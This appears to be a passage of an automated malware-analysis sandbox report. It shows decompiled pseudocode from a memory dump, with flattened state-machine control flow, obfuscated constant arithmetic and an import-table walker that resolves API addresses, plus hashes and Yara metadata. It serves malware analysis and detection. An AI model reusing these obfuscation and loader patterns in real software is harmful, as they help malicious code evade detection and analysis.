                                                      				_v108 = _v108 + 0xe6b6;
                                                      				_v108 = _v108 * 0x5d;
                                                      				_t238 = 0x219f160f;
                                                      				_t207 = 0xe;
                                                      				_v108 = _v108 / _t207;
                                                      				_v108 = _v108 ^ 0x000708e5;
                                                      				_v56 = 0xac50;
                                                      				_t208 = 0x74;
                                                      				_v56 = _v56 / _t208;
                                                      				_v56 = _v56 ^ 0x00005612;
                                                      				_v48 = 0xf915;
                                                      				_v48 = _v48 + 0xc201;
                                                      				_v48 = _v48 ^ 0x0001bde6;
                                                      				_v76 = 0xa4d1;
                                                      				_v76 = _v76 << 0xb;
                                                      				_v76 = _v76 + 0x2090;
                                                      				_v76 = _v76 ^ 0x0526efdc;
                                                      				_v104 = 0x1331;
                                                      				_v104 = _v104 ^ 0x9278d736;
                                                      				_v104 = _v104 << 0xf;
                                                      				_v104 = _v104 << 3;
                                                      				_v104 = _v104 ^ 0x101c0c8f;
                                                      				_v52 = 0x4912;
                                                      				_t209 = 0x53;
                                                      				_v52 = _v52 * 0x5f;
                                                      				_v52 = _v52 ^ 0x001b11ba;
                                                      				_v80 = 0x36f7;
                                                      				_v80 = _v80 | 0x0c78674c;
                                                      				_v80 = _v80 + 0xffff3df1;
                                                      				_v80 = _v80 ^ 0x0c77a943;
                                                      				_v84 = 0x9f3a;
                                                      				_v84 = _v84 << 8;
                                                      				_v84 = _v84 ^ 0x7966a269;
                                                      				_v84 = _v84 ^ 0x79f9b7a1;
                                                      				_v60 = 0xac57;
                                                      				_v60 = _v60 ^ 0x3fa2bf2a;
                                                      				_v60 = _v60 ^ 0x3fa276dc;
                                                      				_v88 = 0xe218;
                                                      				_v88 = _v88 | 0xea5468c5;
                                                      				_v88 = _v88 << 0x10;
                                                      				_v88 = _v88 ^ 0xeadd1cb3;
                                                      				_v64 = 0x6c6b;
                                                      				_v64 = _v64 + 0xffff53e7;
                                                      				_v64 = _v64 ^ 0xffffd13f;
                                                      				_v92 = 0x6a88;
                                                      				_v92 = _v92 >> 1;
                                                      				_v92 = _v92 ^ 0xe005aace;
                                                      				_v92 = _v92 ^ 0xe005a166;
                                                      				_v100 = 0xd6b9;
                                                      				_v100 = _v100 ^ 0x5f91bbd5;
                                                      				_v100 = _v100 ^ 0x5ce69075;
                                                      				_v100 = _v100 >> 0xf;
                                                      				_v100 = _v100 ^ 0x00003faf;
                                                      				_v44 = 0xc8e7;
                                                      				_v44 = _v44 / _t209;
                                                      				_v44 = _v44 ^ 0x00005627;
                                                      				_v72 = 0xdbaa;
                                                      				_t210 = 0x49;
                                                      				_v72 = _v72 / _t210;
                                                      				_v72 = _v72 | 0xff4e0ba5;
                                                      				_v72 = _v72 ^ 0xff4e47cb;
                                                      				_v68 = 0x962f;
                                                      				_v68 = _v68 >> 0xe;
                                                      				_v68 = _v68 << 4;
                                                      				_v68 = _v68 ^ 0x00006f62;
                                                      				_v96 = 0xef5c;
                                                      				_t211 = 0x44;
                                                      				_v96 = _v96 * 0x25;
                                                      				_v96 = _v96 / _t211;
                                                      				_v96 = _v96 << 1;
                                                      				_v96 = _v96 ^ 0x0001262b;
                                                      				_t237 = _v36;
                                                      				_t242 = _v36;
                                                      				goto L1;
                                                      				do {
                                                      					while(1) {
                                                      						L1:
                                                      						_t245 = _t238 - 0x219f160f;
                                                      						if(_t245 > 0) {
                                                      							break;
                                                      						}
                                                      						if(_t245 == 0) {
                                                      							_t238 = 0x2394b362;
                                                      							continue;
                                                      						}
                                                      						if(_t238 == 0x8b9146f) {
                                                      							E00249465(_v68, _t237, _v96);
                                                      							L23:
                                                      							return _t205;
                                                      						}
                                                      						if(_t238 == 0x93670d9) {
                                                      							_t194 = E0024340A(_v80,  &_v32, _v84,  &_v16);
                                                      							asm("sbb esi, esi");
                                                      							_pop(_t211);
                                                      							_t238 = ( ~_t194 & 0xf6f92468) + 0x24090f6a;
                                                      							continue;
                                                      						}
                                                      						if(_t238 == 0x155b4458) {
                                                      							_t196 = E002489D3(_t242, _v108,  &_v36, _v56);
                                                      							_t237 = _t196;
                                                      							_pop(_t211);
                                                      							if(_t196 == 0) {
                                                      								goto L23;
                                                      							}
                                                      							_t238 = 0x35a1dc77;
                                                      							continue;
                                                      						}
                                                      						if(_t238 != 0x1b0233d2) {
                                                      							goto L20;
                                                      						} else {
                                                      							_t199 =  *0x24ca2c; // 0x698300
                                                      							E00246128(_v60, _v88, _v12, _t199 + 0x230, _v64, _v92, _v8 + 1);
                                                      							_t202 =  *0x24ca2c; // 0x698300
                                                      							_t211 = _v16;
                                                      							_t243 =  &(_t243[5]);
                                                      							_t205 = 1;
                                                      							_t238 = 0x24090f6a;
                                                      							 *(_t202 + 0x450) = _v16;
                                                      							continue;
                                                      						}
                                                      					}
                                                      					if(_t238 == 0x2394b362) {
                                                      						_t242 = E0023F4D0(_t211);
                                                      						_t238 = 0x155b4458;
                                                      						goto L20;
                                                      					}
                                                      					if(_t238 == 0x24090f6a) {
                                                      						E0023F536(_v100, _v44, _v72, _v32);
                                                      						_pop(_t211);
                                                      						_t238 = 0x8b9146f;
                                                      						goto L1;
                                                      					}
                                                      					if(_t238 != 0x35a1dc77) {
                                                      						goto L20;
                                                      					}
                                                      					_t238 = 0x8b9146f;
                                                      					if(_v36 > 2) {
                                                      						_t211 = _v48;
                                                      						_t204 = E0023EA4C( *((intOrPtr*)(_t237 + 8)), _v76, _v104,  &_v28, _v52);
                                                      						_t243 =  &(_t243[4]);
                                                      						_v32 = _t204;
                                                      						if(_t204 != 0) {
                                                      							_t238 = 0x93670d9;
                                                      						}
                                                      					}
                                                      					goto L1;
                                                      					L20:
                                                      				} while (_t238 != 0x36620d3);
                                                      				goto L23;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 'V$\$bo
                                                      • API String ID: 0-4178943049
                                                      • Opcode ID: 9d8106d64d37aca7ba755c0e74fa21ee2a66ddb5366a682e1964e58cb55c0f73
                                                      • Instruction ID: 4358f4c8da5ddb53ae57625263d1a3a9b9e3a93a8aba7f791c9e13e457b45644
                                                      • Opcode Fuzzy Hash: 9d8106d64d37aca7ba755c0e74fa21ee2a66ddb5366a682e1964e58cb55c0f73
                                                      • Instruction Fuzzy Hash: 46A1537151C3428FD358CF28C48940BFBF2FBC4758F51892DF5AA96260C7B58A588F86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E002396CD(signed int* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                      				char _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				unsigned int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				signed int _v112;
                                                      				signed int _v116;
                                                      				signed int _v120;
                                                      				unsigned int _v124;
                                                      				signed int _v128;
                                                      				signed int _v132;
                                                      				signed int _v136;
                                                      				signed int _v140;
                                                      				void* _t162;
                                                      				signed int _t179;
                                                      				void* _t192;
                                                      				signed int _t193;
                                                      				signed int _t194;
                                                      				signed int _t195;
                                                      				signed int _t196;
                                                      				signed int _t197;
                                                      				void* _t200;
                                                      				intOrPtr* _t222;
                                                      				signed int* _t223;
                                                      				signed int* _t226;
                                                      
                                                      				_push(_a8);
                                                      				_t222 = _a4;
                                                      				_t223 = __ecx;
                                                      				_push(_t222);
                                                      				_push(__ecx);
                                                      				E0023602B(_t162);
                                                      				_v80 = 0xadf4;
                                                      				_t226 =  &(( &_v140)[4]);
                                                      				_t200 = 0xade8ac2;
                                                      				_t193 = 0x38;
                                                      				_v80 = _v80 / _t193;
                                                      				_v80 = _v80 ^ 0x00005e4d;
                                                      				_v88 = 0xd682;
                                                      				_v88 = _v88 ^ 0xf51d39be;
                                                      				_v88 = _v88 ^ 0xf51dab09;
                                                      				_v96 = 0x72b2;
                                                      				_v96 = _v96 ^ 0xfa4c809d;
                                                      				_v96 = _v96 ^ 0xfa4c99cb;
                                                      				_v116 = 0x90ca;
                                                      				_v116 = _v116 | 0x91d06c09;
                                                      				_v116 = _v116 ^ 0x5d2d7dc0;
                                                      				_v116 = _v116 ^ 0xccfdf140;
                                                      				_v124 = 0x94f4;
                                                      				_v124 = _v124 >> 9;
                                                      				_t194 = 0x7e;
                                                      				_v124 = _v124 / _t194;
                                                      				_v124 = _v124 >> 1;
                                                      				_v124 = _v124 ^ 0x00005a93;
                                                      				_v92 = 0xb2da;
                                                      				_v92 = _v92 >> 0xf;
                                                      				_v92 = _v92 ^ 0x00004526;
                                                      				_v132 = 0xfe39;
                                                      				_v132 = _v132 ^ 0x94a2bb32;
                                                      				_v132 = _v132 + 0xffff197d;
                                                      				_v132 = _v132 + 0xa385;
                                                      				_v132 = _v132 ^ 0x94a23d21;
                                                      				_v104 = 0xe4d2;
                                                      				_v104 = _v104 ^ 0x49cfaa80;
                                                      				_v104 = _v104 | 0x48b9e868;
                                                      				_v104 = _v104 ^ 0x49ffe136;
                                                      				_v112 = 0xb598;
                                                      				_v112 = _v112 ^ 0x0d96fbe5;
                                                      				_v112 = _v112 + 0x88b9;
                                                      				_v112 = _v112 ^ 0x0d96d484;
                                                      				_v136 = 0x3e03;
                                                      				_v136 = _v136 ^ 0x29ac334c;
                                                      				_v136 = _v136 >> 9;
                                                      				_v136 = _v136 << 8;
                                                      				_v136 = _v136 ^ 0x14d602a1;
                                                      				_v120 = 0xd3c3;
                                                      				_t195 = 0x26;
                                                      				_v120 = _v120 / _t195;
                                                      				_t196 = 0x3e;
                                                      				_v120 = _v120 * 0x17;
                                                      				_v120 = _v120 ^ 0x0000f1c0;
                                                      				_v140 = 0x72b1;
                                                      				_v140 = _v140 + 0xffffab40;
                                                      				_v140 = _v140 << 0xe;
                                                      				_v140 = _v140 / _t196;
                                                      				_v140 = _v140 ^ 0x001e8f72;
                                                      				_v128 = 0x9994;
                                                      				_v128 = _v128 + 0xffff8c6c;
                                                      				_v128 = _v128 + 0xa4f6;
                                                      				_t197 = 0x3d;
                                                      				_v128 = _v128 / _t197;
                                                      				_v128 = _v128 ^ 0x00001242;
                                                      				_v100 = 0x8258;
                                                      				_v100 = _v100 + 0xffff85b7;
                                                      				_v100 = _v100 * 0x51;
                                                      				_v100 = _v100 ^ 0x000280a1;
                                                      				_v84 = 0x5c44;
                                                      				_v84 = _v84 ^ 0x1285eccb;
                                                      				_v84 = _v84 ^ 0x12858e57;
                                                      				_v108 = 0x7f88;
                                                      				_v108 = _v108 | 0x4d438ffe;
                                                      				_v108 = _v108 + 0xffff02b4;
                                                      				_v108 = _v108 ^ 0x4d436acf;
                                                      				do {
                                                      					while(_t200 != 0xade8ac2) {
                                                      						if(_t200 == 0xeed9730) {
                                                      							_push(_t200);
                                                      							_push(_t200);
                                                      							_t179 = E00238736(_t223[1]);
                                                      							 *_t223 = _t179;
                                                      							__eflags = _t179;
                                                      							if(__eflags != 0) {
                                                      								_t200 = 0x173d5c4e;
                                                      								continue;
                                                      							}
                                                      						} else {
                                                      							if(_t200 == 0xffe2862) {
                                                      								E0024360F( &_v76, _v120, _v140,  *_t222, _v128);
                                                      								_t226 =  &(_t226[3]);
                                                      								_t200 = 0x220c9c88;
                                                      								continue;
                                                      							} else {
                                                      								if(_t200 == 0x173d5c4e) {
                                                      									E002450F2( &_v76, _v104, _v112, _v136, _t223);
                                                      									_t226 =  &(_t226[3]);
                                                      									_t200 = 0xffe2862;
                                                      									continue;
                                                      								} else {
                                                      									if(_t200 == 0x220c9c88) {
                                                      										E00237998(_v100, _v84, __eflags, _t222 + 4,  &_v76, _v108);
                                                      									} else {
                                                      										if(_t200 != 0x2d9f638c) {
                                                      											goto L13;
                                                      										} else {
                                                      											_t207 = _t222;
                                                      											_t223[1] = E00247A0F(_t222);
                                                      											_t192 = E002378A5(_t222, _t207, 0x1000, _t207, 0x400);
                                                      											_t226 =  &(_t226[4]);
                                                      											_t200 = 0xeed9730;
                                                      											_t223[1] = _t223[1] + _t192;
                                                      											continue;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L16:
                                                      						__eflags =  *_t223;
                                                      						_t161 =  *_t223 != 0;
                                                      						__eflags = _t161;
                                                      						return 0 | _t161;
                                                      					}
                                                      					 *_t223 = 0;
                                                      					_t200 = 0x2d9f638c;
                                                      					_t223[1] = 0;
                                                      					L13:
                                                      					__eflags = _t200 - 0x18ac994b;
                                                      				} while (__eflags != 0);
                                                      				goto L16;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &E$D\$M^
                                                      • API String ID: 0-182273106
                                                      • Opcode ID: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
                                                      • Instruction ID: 5273681e539744de221480bce5bbc0da8f6f74133b7dac2cdd75fba39104ce74
                                                      • Opcode Fuzzy Hash: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
                                                      • Instruction Fuzzy Hash: 9F8164B15183819FD368CF25C88991BBBF0BBD9354F50891CF196862A1D3B6CA99CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0023153C() {
                                                      				char _v520;
                                                      				signed int _v524;
                                                      				signed int _v528;
                                                      				signed int _v532;
                                                      				signed int _v536;
                                                      				signed int _v540;
                                                      				signed int _v544;
                                                      				signed int _v548;
                                                      				signed int _v552;
                                                      				signed int _v556;
                                                      				signed int _v560;
                                                      				signed int _t116;
                                                      				void* _t117;
                                                      				void* _t119;
                                                      				signed int _t122;
                                                      				signed int _t134;
                                                      				void* _t136;
                                                      				signed int _t137;
                                                      				signed int* _t138;
                                                      
                                                      				_t138 =  &_v560;
                                                      				_v528 = 0xa2e9;
                                                      				_v528 = _v528 + 0xfffffe64;
                                                      				_t119 = 0x3a74a7f9;
                                                      				_v528 = _v528 ^ 0x0000e8bc;
                                                      				_v532 = 0xc148;
                                                      				_v532 = _v532 + 0x228e;
                                                      				_v532 = _v532 ^ 0x0000dc63;
                                                      				_v548 = 0x43c;
                                                      				_v548 = _v548 + 0xffff6922;
                                                      				_v548 = _v548 | 0xfd2a2fe1;
                                                      				_v548 = _v548 ^ 0xb6db9be5;
                                                      				_v548 = _v548 ^ 0x4924f3d5;
                                                      				_v544 = 0x1b71;
                                                      				_v544 = _v544 ^ 0xba1667e6;
                                                      				_v544 = _v544 >> 2;
                                                      				_v544 = _v544 << 7;
                                                      				_v544 = _v544 ^ 0x42cfc722;
                                                      				_v540 = 0x29dd;
                                                      				_v540 = _v540 + 0xa2;
                                                      				_v540 = _v540 ^ 0xc29808bd;
                                                      				_v540 = _v540 + 0xffff2b53;
                                                      				_v540 = _v540 ^ 0xc2975a13;
                                                      				_v556 = 0x7857;
                                                      				_v556 = _v556 ^ 0xa059c8e7;
                                                      				_v556 = _v556 << 9;
                                                      				_v556 = _v556 << 4;
                                                      				_v556 = _v556 ^ 0x361613d4;
                                                      				_v560 = 0x6ef2;
                                                      				_v560 = _v560 ^ 0x7dc12174;
                                                      				_v560 = _v560 * 0x52;
                                                      				_t136 = 0;
                                                      				_v560 = _v560 ^ 0x47eb388f;
                                                      				_v536 = 0x33fe;
                                                      				_v536 = _v536 + 0x28fb;
                                                      				_v536 = _v536 ^ 0x000029c0;
                                                      				_v552 = 0x40f6;
                                                      				_v552 = _v552 | 0x9b4debbc;
                                                      				_v552 = _v552 + 0x1ce1;
                                                      				_t134 = 0x7e;
                                                      				_t137 = _v536;
                                                      				_t135 = _v536;
                                                      				_v552 = _v552 / _t134;
                                                      				_v552 = _v552 ^ 0x013b83e5;
                                                      				_v524 = 0xe5bd;
                                                      				_v524 = _v524 ^ 0x97a1ef4c;
                                                      				_v524 = _v524 ^ 0x97a11b87;
                                                      				do {
                                                      					while(_t119 != 0x6cc9294) {
                                                      						if(_t119 == 0xcd96d8e) {
                                                      							_v560 = 0x65f6;
                                                      							_t122 = 0x33;
                                                      							_v560 = _v560 / _t122;
                                                      							_v560 = _v560 + 0xffffea35;
                                                      							_v560 = _v560 ^ 0xd5d8ecd6;
                                                      							_t136 =  ==  ? 1 : _t136;
                                                      						} else {
                                                      							if(_t119 == 0x11374e9c) {
                                                      								E0023E29C(_v552, _v524, _t137);
                                                      								_t119 = 0xcd96d8e;
                                                      								continue;
                                                      							} else {
                                                      								if(_t119 == 0x31a842b3) {
                                                      									_t116 = E00238697();
                                                      									_t135 = _t116;
                                                      									if(_t116 != 0) {
                                                      										_t119 = 0x34255e69;
                                                      										continue;
                                                      									}
                                                      								} else {
                                                      									if(_t119 == 0x34255e69) {
                                                      										_t117 = E002360B9( &_v520, _v548, _v544, _t119, _v540, _t135, _v556);
                                                      										_t138 =  &(_t138[5]);
                                                      										if(_t117 != 0) {
                                                      											_t119 = 0x6cc9294;
                                                      											continue;
                                                      										}
                                                      									} else {
                                                      										if(_t119 != 0x3a74a7f9) {
                                                      											goto L14;
                                                      										} else {
                                                      											_t119 = 0x31a842b3;
                                                      											continue;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L17:
                                                      						return _t136;
                                                      					}
                                                      					_t137 = E002328CE( &_v520, _v560, _v536);
                                                      					_t119 = 0x11374e9c;
                                                      					L14:
                                                      				} while (_t119 != 0x55f7722);
                                                      				goto L17;
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Wx$i^%4$i^%4
                                                      • API String ID: 0-1584002782
                                                      • Opcode ID: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
                                                      • Instruction ID: 39f4710d89ebfa78ed42010ac6efb6bf4a3a7838aa570a9a997faf1b45a316ed
                                                      • Opcode Fuzzy Hash: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
                                                      • Instruction Fuzzy Hash: 535158711183428FD398CE25C58A42BFBE1BBC4758F140E1DF496962A0D7B4CA69CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E00247D03() {
                                                      				signed int _v4;
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				intOrPtr _t105;
                                                      				intOrPtr _t112;
                                                      				signed int _t114;
                                                      				signed int _t115;
                                                      				signed int _t116;
                                                      				intOrPtr _t117;
                                                      				void* _t119;
                                                      				void* _t129;
                                                      				signed int* _t131;
                                                      
                                                      				_t131 =  &_v44;
                                                      				_v8 = 0x68fc;
                                                      				_v8 = _v8 + 0xbb36;
                                                      				_v8 = _v8 ^ 0x000162e9;
                                                      				_v44 = 0xabcf;
                                                      				_t114 = 0x5a;
                                                      				_v44 = _v44 / _t114;
                                                      				_v44 = _v44 << 5;
                                                      				_t129 = 0x1aabdcf3;
                                                      				_v44 = _v44 ^ 0x41a75d37;
                                                      				_v44 = _v44 ^ 0x41a744f3;
                                                      				_v12 = 0xa837;
                                                      				_v12 = _v12 + 0xbdd3;
                                                      				_v12 = _v12 ^ 0x0001592e;
                                                      				_v36 = 0x1a64;
                                                      				_v36 = _v36 + 0x1ecf;
                                                      				_v36 = _v36 | 0x383b765c;
                                                      				_v36 = _v36 ^ 0x383b27b5;
                                                      				_v40 = 0x1cb7;
                                                      				_v40 = _v40 | 0xfad83379;
                                                      				_t115 = 0x73;
                                                      				_v40 = _v40 / _t115;
                                                      				_v40 = _v40 ^ 0x022e74ac;
                                                      				_v16 = 0x5673;
                                                      				_v16 = _v16 << 4;
                                                      				_v16 = _v16 ^ 0x00050551;
                                                      				_v20 = 0x8ddb;
                                                      				_v20 = _v20 + 0xffffc9bf;
                                                      				_t116 = 0x22;
                                                      				_v20 = _v20 * 0x54;
                                                      				_v20 = _v20 ^ 0x001c9060;
                                                      				_v24 = 0x24b0;
                                                      				_v24 = _v24 ^ 0x7eaabc9b;
                                                      				_v24 = _v24 ^ 0x558f972f;
                                                      				_v24 = _v24 ^ 0x2b251b7e;
                                                      				_v28 = 0xbf97;
                                                      				_v28 = _v28 + 0xffff41a2;
                                                      				_v28 = _v28 * 0x14;
                                                      				_v28 = _v28 ^ 0x00001fe8;
                                                      				_v32 = 0x3a57;
                                                      				_v32 = _v32 << 3;
                                                      				_v32 = _v32 ^ 0x30418ed0;
                                                      				_v32 = _v32 ^ 0x30407688;
                                                      				_v4 = 0xf5c8;
                                                      				_v4 = _v4 / _t116;
                                                      				_v4 = _v4 ^ 0x00000add;
                                                      				_t117 =  *0x24ca30; // 0x0
                                                      				do {
                                                      					while(_t129 != 0x15241428) {
                                                      						if(_t129 == 0x1aabdcf3) {
                                                      							_push(_t117);
                                                      							_push(_t117);
                                                      							_t119 = 0x2c;
                                                      							_t117 = E00238736(_t119);
                                                      							 *0x24ca30 = _t117;
                                                      							if(_t117 != 0) {
                                                      								_t129 = 0x337355f8;
                                                      								continue;
                                                      							}
                                                      						} else {
                                                      							if(_t129 != 0x337355f8) {
                                                      								goto L8;
                                                      							} else {
                                                      								_push(_t117);
                                                      								_t112 = E002359D5(_t117, _v36, _t117, _v40, _v16);
                                                      								_t117 =  *0x24ca30; // 0x0
                                                      								_t131 =  &(_t131[5]);
                                                      								_t129 = 0x15241428;
                                                      								 *((intOrPtr*)(_t117 + 8)) = _t112;
                                                      								continue;
                                                      							}
                                                      						}
                                                      						goto L9;
                                                      					}
                                                      					_push(_t117);
                                                      					_t105 = E00231132(_v20, _t117, _v24, _t117, 0, _v28, _v32, _v4, E0023E377);
                                                      					_t117 =  *0x24ca30; // 0x0
                                                      					_t131 =  &(_t131[9]);
                                                      					_t129 = 0x3afebe4c;
                                                      					 *((intOrPtr*)(_t117 + 0x18)) = _t105;
                                                      					L8:
                                                      				} while (_t129 != 0x3afebe4c);
                                                      				L9:
                                                      				return 0 | _t117 != 0x00000000;
                                                      			}

                                                      0x00247efc
                                                      0x00247eff
                                                      0x00247f01
                                                      0x00247f04
                                                      0x00247f04
                                                      0x00247f0d
                                                      0x00247f1a

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: W:$\v;8$sV
                                                      • API String ID: 0-492820393
                                                      • Opcode ID: 7f485dfd548d40d57caa53e3dc0af1f2cfa7d50b8ed3ce7bcbb9a74163955e90
                                                      • Instruction ID: be63e9ef7a2168ff48f048429fd6eb85a429d8fb2f5db673e0252099f683f720
                                                      • Opcode Fuzzy Hash: 7f485dfd548d40d57caa53e3dc0af1f2cfa7d50b8ed3ce7bcbb9a74163955e90
                                                      • Instruction Fuzzy Hash: 1C51A9B11193019FD358CF25D88A81FBBE1FB89358F500A1DF4969A2A0D3B5CA59CF87
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0023E05A(void* __ecx, void* __edx) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed short _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _t107;
                                                      				signed short _t113;
                                                      				signed short _t116;
                                                      				signed short _t118;
                                                      				signed int _t120;
                                                      				signed int _t121;
                                                      				signed int _t122;
                                                      				signed int _t123;
                                                      				intOrPtr _t124;
                                                      				signed short _t128;
                                                      				signed short* _t143;
                                                      				signed short _t145;
                                                      				void* _t146;
                                                      				signed int* _t147;
                                                      
                                                      				_t147 =  &_v48;
                                                      				_v16 = 0x6d293b;
                                                      				_v12 = 0x468ef5;
                                                      				_v8 = 0;
                                                      				_v4 = 0;
                                                      				_t146 = __ecx;
                                                      				_v40 = 0x7b4e;
                                                      				_v40 = _v40 + 0xffff3b83;
                                                      				_v40 = _v40 + 0xffffa7a8;
                                                      				_v40 = _v40 ^ 0xffff5e78;
                                                      				_v20 = 0xb6a1;
                                                      				_t120 = 0x38;
                                                      				_v20 = _v20 / _t120;
                                                      				_v20 = _v20 ^ 0x00007f71;
                                                      				_v44 = 0x997f;
                                                      				_v44 = _v44 ^ 0xba9196e9;
                                                      				_v44 = _v44 ^ 0x66374254;
                                                      				_t26 =  &_v44; // 0x66374254
                                                      				_t121 = 0xe;
                                                      				_v44 =  *_t26 / _t121;
                                                      				_v44 = _v44 ^ 0x0fc29c0d;
                                                      				_v48 = 0x4c26;
                                                      				_v48 = _v48 | 0xfd76fef6;
                                                      				_v48 = _v48 >> 3;
                                                      				_v48 = _v48 ^ 0x1faed217;
                                                      				_v24 = 0xc5b2;
                                                      				_t122 = 0x42;
                                                      				_v24 = _v24 * 0x67;
                                                      				_v24 = _v24 << 9;
                                                      				_v24 = _v24 ^ 0x9f1566f7;
                                                      				_v28 = 0x55d;
                                                      				_v28 = _v28 << 0xb;
                                                      				_v28 = _v28 / _t122;
                                                      				_v28 = _v28 ^ 0x0000f55e;
                                                      				_v32 = 0x8f6f;
                                                      				_t123 = 6;
                                                      				_v32 = _v32 * 0x4f;
                                                      				_v32 = _v32 + 0xffffe8fc;
                                                      				_v32 = _v32 ^ 0x002c0f4c;
                                                      				_v36 = 0xd672;
                                                      				_v36 = _v36 / _t123;
                                                      				_v36 = _v36 + 0xffffc0a7;
                                                      				_v36 = _v36 ^ 0xffffa997;
                                                      				_t107 = _v40;
                                                      				_t124 =  *((intOrPtr*)(__edx + 0x78 + _t107 * 8));
                                                      				if(_t124 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t107 * 8)) == 0) {
                                                      					L13:
                                                      					return 1;
                                                      				} else {
                                                      					_t145 = _t124 + __ecx;
                                                      					while(1) {
                                                      						_t110 =  *((intOrPtr*)(_t145 + 0xc));
                                                      						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
                                                      							goto L13;
                                                      						}
                                                      						_t128 = E00244AAF(_t110 + _t146, _v20, _v44, _v48);
                                                      						_v40 = _t128;
                                                      						__eflags = _t128;
                                                      						if(_t128 == 0) {
                                                      							L15:
                                                      							return 0;
                                                      						}
                                                      						_t143 =  *_t145 + _t146;
                                                      						_t118 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
                                                      						while(1) {
                                                      							_t113 =  *_t143;
                                                      							__eflags = _t113;
                                                      							if(__eflags == 0) {
                                                      								break;
                                                      							}
                                                      							if(__eflags >= 0) {
                                                      								_t115 = _t113 + 2 + _t146;
                                                      								__eflags = _t113 + 2 + _t146;
                                                      							} else {
                                                      								_t115 = _t113 & 0x0000ffff;
                                                      							}
                                                      							_t116 = E00236228(_v24, _v28, _v32, _v36, _t128, _t115);
                                                      							_t147 =  &(_t147[4]);
                                                      							__eflags = _t116;
                                                      							if(_t116 == 0) {
                                                      								goto L15;
                                                      							} else {
                                                      								_t128 = _v40;
                                                      								_t143 =  &(_t143[2]);
                                                      								 *_t118 = _t116;
                                                      								_t118 = _t118 + 4;
                                                      								__eflags = _t118;
                                                      								continue;
                                                      							}
                                                      						}
                                                      						_t145 = _t145 + 0x14;
                                                      						__eflags = _t145;
                                                      					}
                                                      					goto L13;
                                                      				}
                                                      			}





























                                                      0x0023e05a
                                                      0x0023e05d
                                                      0x0023e065
                                                      0x0023e075
                                                      0x0023e07b
                                                      0x0023e07f
                                                      0x0023e081
                                                      0x0023e089
                                                      0x0023e091
                                                      0x0023e099
                                                      0x0023e0a1
                                                      0x0023e0af
                                                      0x0023e0b4
                                                      0x0023e0ba
                                                      0x0023e0c2
                                                      0x0023e0ca
                                                      0x0023e0d2
                                                      0x0023e0da
                                                      0x0023e0de
                                                      0x0023e0e3
                                                      0x0023e0e9
                                                      0x0023e0f1
                                                      0x0023e0f9
                                                      0x0023e101
                                                      0x0023e106
                                                      0x0023e10e
                                                      0x0023e11b
                                                      0x0023e11e
                                                      0x0023e122
                                                      0x0023e127
                                                      0x0023e12f
                                                      0x0023e137
                                                      0x0023e144
                                                      0x0023e148
                                                      0x0023e150
                                                      0x0023e15d
                                                      0x0023e15e
                                                      0x0023e162
                                                      0x0023e16a
                                                      0x0023e172
                                                      0x0023e180
                                                      0x0023e184
                                                      0x0023e18c
                                                      0x0023e194
                                                      0x0023e198
                                                      0x0023e19e
                                                      0x0023e21c
                                                      0x00000000
                                                      0x0023e1a6
                                                      0x0023e1a6
                                                      0x0023e215
